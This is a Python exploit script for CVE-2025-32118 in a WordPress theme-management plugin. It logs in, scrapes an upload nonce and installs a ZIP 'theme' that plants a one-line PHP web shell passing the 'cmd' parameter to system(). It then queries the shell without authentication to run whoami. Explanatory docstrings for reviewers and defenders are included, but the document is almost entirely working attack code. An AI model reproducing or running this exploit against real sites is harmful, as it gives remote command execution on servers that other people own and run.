POC / CVE-2025-32118.py PY
import requests
import zipfile
import os
import argparse
from bs4 import BeautifulSoup

# Exploit by: Nxploited | Khaled Alenazi

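def create_zip(zip_name):
    """Build the theme archive that this proof of concept uploads.

    The archive holds one top-level folder, ``nxploitedshell/``, containing a
    ``style.css`` theme header and ``nxploitedshell.php``, a one-line PHP file
    that passes the ``cmd`` query parameter to ``system()``.

    The files are staged in a private temporary directory instead of
    ``./nxploitedshell``. Staging in the working directory would pack, and
    then delete, any files that already sat in a directory of that name, and
    would leave the staged files behind if writing the archive failed.

    Args:
        zip_name: Path of the ZIP file to create (overwritten if present).
    """
    import tempfile  # local import: only this function needs it

    theme_name = "nxploitedshell"
    staged_files = {
        "style.css": "/*\nTheme Name: Nxploited\nDescription: Educational exploit\n*/",
        "nxploitedshell.php": "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>",
    }

    # TemporaryDirectory removes the staging tree even when an error occurs.
    with tempfile.TemporaryDirectory() as staging_root:
        theme_dir = os.path.join(staging_root, theme_name)
        os.makedirs(theme_dir)

        for filename, content in staged_files.items():
            with open(os.path.join(theme_dir, filename), "w") as f:
                f.write(content)

        with zipfile.ZipFile(zip_name, 'w') as zipf:
            for filename in staged_files:
                # Archive names stay relative to the theme folder's parent,
                # i.e. "nxploitedshell/<file>".
                zipf.write(
                    os.path.join(theme_dir, filename),
                    f"{theme_name}/{filename}",
                )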

def login(session, url, username, password, headers):
    """Authenticate to WordPress through ``wp-login.php``.

    Posts the login form with the supplied credentials. Success is judged
    only by the session's cookie jar: the function returns True when, after
    the request, some cookie name contains ``wordpress_logged_in``. The
    response body and status code are not inspected.

    Args:
        session: Object exposing ``post()`` and an iterable ``cookies`` jar.
        url: Base URL of the site, without a trailing slash.
        username: Account name sent as ``log``.
        password: Password sent as ``pwd``.
        headers: Request headers passed through to ``session.post``.

    Returns:
        True if a logged-in cookie is present afterwards, otherwise False.
    """
    credentials = {"log": username, "pwd": password}
    form = {**credentials, "rememberme": "forever", "wp-submit": "Log In"}

    session.post(f"{url}/wp-login.php", data=form, headers=headers)

    for cookie in session.cookies:
        if "wordpress_logged_in" in cookie.name:
            print("[+] Logged in successfully.")
            return True

    print("[-] Login failed.")
    return False

def get_nonce(session, url, headers):
    """Read the form nonce from the plugin's theme-upload admin page.

    Fetches ``admin.php?page=cmp-upload-theme`` with the authenticated
    session and returns the ``value`` of the ``<input>`` named
    ``save_options_field``.

    Args:
        session: Authenticated session exposing ``get()``.
        url: Base URL of the site, without a trailing slash.
        headers: Request headers passed through to ``session.get``.

    Returns:
        The nonce string, or None when the field is absent or any exception
        is raised while fetching or parsing the page.
    """
    page_url = f"{url}/wp-admin/admin.php?page=cmp-upload-theme"
    try:
        html = session.get(page_url, headers=headers).text
        field = BeautifulSoup(html, 'html.parser').find(
            "input", {"name": "save_options_field"}
        )
        if not field:
            # Field not on the page: give up without printing a message.
            return None
        nonce = field["value"]
        print(f"[+] Nonce extracted: {nonce}")
        return nonce
    except Exception as e:
        # Broad catch: network errors and a missing "value" attribute both
        # end up here.
        print(f"[-] Failed to extract nonce: {e}")
    return None

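def upload_zip(session, url, nonce, headers, zip_path):
    """Submit the theme archive to the plugin's settings page.

    Sends a multipart POST to ``admin.php?page=cmp-settings`` carrying the
    archive as ``fileToUpload`` together with the nonce, a fixed
    ``_wp_http_referer`` value and ``submit_theme``. The upload is reported
    as successful when the response body contains the text
    ``was successfully installed``.

    The archive is opened in a ``with`` block so the file handle is closed
    once the request has been sent, instead of staying open until garbage
    collection.

    Args:
        session: Authenticated session exposing ``post()``.
        url: Base URL of the site, without a trailing slash.
        nonce: Value for the ``save_options_field`` form field.
        headers: Request headers passed through to ``session.post``.
        zip_path: Local path of the archive to upload.

    Returns:
        True if the success text is found in the response, otherwise False.
    """
    post_url = f"{url}/wp-admin/admin.php?page=cmp-settings"
    data = {
        "save_options_field": nonce,
        "_wp_http_referer": "/wordpress/wp-admin/admin.php?page=cmp-upload-theme",
        "submit_theme": "Install Theme"
    }

    with open(zip_path, "rb") as archive:
        files = {
            "fileToUpload": ("Nxploited.zip", archive, "application/zip")
        }
        response = session.post(post_url, headers=headers, files=files, data=data)

    if "was successfully installed" in response.text:
        print("[+] Exploit uploaded successfully.")
        return True
    print("[-] Upload failed.")
    return False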

def check_shell(url):
    """Request the uploaded PHP file once and print what comes back.

    Issues a GET for ``nxploitedshell.php?cmd=whoami`` under
    ``wp-content/plugins/cmp-premium-themes/nxploitedshell/`` and prints the
    response body when the status code is 200.

    Notes for reviewers and defenders:
      * The request goes through ``requests.get`` rather than the logged-in
        session, so it carries no cookies: the uploaded file answers without
        authentication.
      * Nothing in this script removes the uploaded folder. After an
        authorized test it has to be deleted from the server by hand.
      * The path above and a ``cmd`` query parameter are what this check
        leaves in the web server's access log.
      * NOTE(review): a 200 status alone is treated as success; a site that
        answers 200 for missing pages would also be reported as accessible.

    Args:
        url: Base URL of the site, without a trailing slash.
    """
    shell_url = (
        f"{url}/wp-content/plugins/cmp-premium-themes/"
        "nxploitedshell/nxploitedshell.php?cmd=whoami"
    )
    try:
        reply = requests.get(shell_url, timeout=10)
        if reply.status_code != 200:
            print("[-] Shell not accessible.")
        else:
            print(f"[+] Shell is accessible: {shell_url}")
            print(f"[+] Response: {reply.text.strip()}")
    except Exception as e:
        print(f"[-] Target is unreachable or shell failed: {e}")
def banner():
    """Print the one-line title of the script to standard output."""
    title = "Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi"
    print(title)

def main():
    """Parse the command line and run the steps in order.

    Sequence: build the archive, log in, read the nonce from the upload page,
    upload the archive, then request the uploaded file. The run stops
    quietly as soon as login or nonce extraction fails.

    Notes for reviewers:
      * The password is taken from the command line, where it is visible in
        shell history and process listings.
      * Certificate verification is switched off for the session and the
        related warnings are silenced, so the credentials are sent without
        checking the server's identity.
      * ``Nxploited.zip`` is written to the working directory and is not
        removed afterwards.
    """
    title = "Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi"
    parser = argparse.ArgumentParser(description=title)
    options = (
        ("-u", "--url", "Base URL of WordPress site"),
        ("-un", "--username", "Admin username"),
        ("-p", "--password", "Admin password"),
    )
    for short_flag, long_flag, help_text in options:
        parser.add_argument(short_flag, long_flag, required=True, help=help_text)
    args = parser.parse_args()

    archive_name = "Nxploited.zip"
    request_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"}

    session = requests.Session()
    # TLS certificate checks are disabled for every request on this session.
    session.verify = False
    requests.packages.urllib3.disable_warnings()

    banner()
    create_zip(archive_name)

    if login(session, args.url, args.username, args.password, request_headers):
        nonce = get_nonce(session, args.url, request_headers)
        if nonce and upload_zip(session, args.url, nonce, request_headers, archive_name):
            check_shell(args.url)

# Run the proof of concept only when the file is executed as a script,
# not when it is imported.
if __name__ == "__main__":
    main()